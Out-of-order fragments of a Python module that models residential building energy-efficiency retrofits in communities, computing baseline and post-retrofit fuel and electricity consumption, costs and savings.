costs':1.0}):", "(MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\", "electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly", "(self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price", "= diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd", "s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG =", "the number of units that have not been retrofit as of 2010, the", "-------- aaem.community_data : community data module, see information on CommunityData Object aaem.forecast :", "Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost", "float a # of houses cf: float conversion factor Returns ------- float: fuel", ": int Houses that can be retrofit savings_HF : float savings in heating", "wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil", "aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module,", "(gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane", "fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs()", "EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area", "component output csv in directory Parameters ---------- directory : path output directory \"\"\"", "baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption", "[Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption)", "= \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get", "= {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a", "np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption :", "self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'],", "DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All", "type. Attributes ---------- init_HF : float initial heating oil consumption init_wood : float", "calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast :", "aaem.community_data : community data module, see information on CommunityData Object aaem.forecast : forecast", "\"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost", "float savings in heating cordwood consumption savings_gas : float savings in natural gas", "self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost =", "self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All", "dictionary general data for a community. Initial value: 'community' section of community_data comp_specs", "r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption", "baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array", "self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved", "self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost", "# kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital", "msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses", "\"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh", "electric or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]:", "to run. Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to", "Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane", "= avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \"", "= self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val /", "self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit", "+ \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline", "self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP =", "np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption :", "---------- annual_electric_savings : np.array electric savings ($/year) are the difference in the base", "\"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\",", "gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat -", "sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ----------", "= \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh", "(Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG,", "np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil", "self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated", "= self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname =", "total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings", "r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is", "Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\",", "(gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential:", "annual_electric_savings : np.array electric savings ($/year) are the difference in the base and", "print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption", "Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential:", "= \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF", "= 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption", "Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag or", "scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~", "the capital costs. Attributes ---------- capital_costs : float total cost of improvements ($)", "int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average", "Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt", "def save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters ----------", "self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0:", "AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics", "#~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg", "Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat", "heating cordwood consumption init_gas : float initial natural gas fuel consumption init_LP :", "\"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year)", "\"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError:", "self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\", "data for a community. Initial value: 'community' section of community_data comp_specs : dictionary", "electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost =", "Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost", "kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con", "retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost =", "total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH", "fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\"", "1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH *", "self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost()", "Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating", "kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost", "consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric", "init_wood : float initial heating cordwood consumption init_gas : float initial natural gas", "[mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf)", "forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed", "Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con", "def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed", "Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not", "\"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year)", "Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential:", "Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All", "savings_kWh : float savings in electric consumption savings_mmbtu: float total savings in mmbtu", "amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption", "consumption savings_gas : float savings in natural gas fuel consumption savings_LP : float", "All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential:", "constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler", "self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative,", "total fuel saved. Returns ------- float the total fuel saved in gallons \"\"\"", "self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\",", "if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was", "self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost =", "an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH", "= self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG", "s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost", "Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"]", "average electric consumption per household (kWh/year). >= 6000 \"\"\" # 500 average energy", "+ \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption", "calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating", "\"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption", "years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\", "diag or new diagnostics object forecast : forecast community forecast for estimating future", "\\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords", "{'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual Net Benefit,", "= self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None:", "self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\", "1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH", "self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the total", "electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh", ")['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or", "------- float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] -", "improvements to heating efficiency of residential buildings (homes). Consumption and savings are based", ": np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\", "self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption *", "Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year)", "for a community. Initial value: 'Residential Buildings' section of community_data See also --------", "\"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\",", "self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating", "self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average", "community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost']", "total_consumption : float total consumption for residential buildings HH : float a #", "of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "* elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP", "fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year]", "\"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\",", "* (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate", "= self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self,", "self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline", "Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential:", "Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost", "\"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years,", "Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas import DataFrame", "self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con", "runs to completion, False otherwise reason : string lists reason for failure if", "Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(),", "0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings =", "# of houses cf: float conversion factor Returns ------- float: fuel consumed for", "# kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost)", "self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current", "= self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print", "self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array", "self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name,", "a community. Initial value: 'community' section of community_data comp_specs : dictionary component specific", "initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total", "price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price =", "summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name", "0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" ) ##", "self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted", "Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric", "Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio,", "(cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year)", "gas fuel consumption init_LP : float initial propane consumption init_kWh : float initial", "of 2010, the performance improvements as a percentage of the pre-retrofit consumption, and", "Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential:", "(1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption,", "np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes", "total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"]", "------- float the total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life]", "self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast", "(gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential:", ": int estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year)", "Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "= \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption", "Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential:", "self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf):", "(gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year)", "self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except", "= \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural", "as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area =", "/ np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total", "baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent", "this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed", "ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating", "constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\", "the component runs to completion, False otherwise reason : string lists reason for", "costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\", "initial value: forecast cd : dictionary general data for a community. Initial value:", "on CommunityData Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics", "#~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas", "Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area", "a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption", "gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil -", "\"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post", "# comes from. con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~", "-rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if", "for a community forecast : Forecast forecast for a community diagnostics : diagnostics,", "component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics()", "(MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating", "= self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost -", "or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption()", "Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH)", "from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the", "diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast,", "diagnostics for tracking error/warning messages initial value: diag or new diagnostics object forecast", "float savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd", "years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF)", "by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the", "= np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler =", "set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed", "Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating", "scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file", "years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\", "cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh 